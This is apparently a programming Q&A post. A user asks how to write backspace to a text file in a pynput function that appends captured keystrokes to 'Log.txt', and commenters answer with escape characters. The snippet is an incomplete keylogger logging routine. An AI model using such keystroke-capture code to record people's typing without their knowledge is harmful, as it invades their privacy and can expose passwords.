# i don't know how to write backspace in pynput to a txt file. Python

Tags: python

```
def write_file(keys):
    with open('Log.txt', "a") as f:
        for key in keys:
            k = str(key).replace("'","")
            if k.find("space") > 0:
                f.write(' ')
            elif k.find("Key") == -1:
                f.write(k)
            if k.find("enter") > 0:
                f.write('\n')
            if k.find("tab") > 0:
                f.write('\n')
            if k.find("backspace") > 0:
                #f.write(" ") <--- here!
```

Please help me! i dont't know what to do!
in "f.write" i don't know what to code.

Comment: I think `"\t"` is what you want.

Comment: Tab should be `\t`, and backspace is `\b`

Comment: needs more clarification. whats `keys`?

Comment: @h4z3 - Right! I hit the wrong key.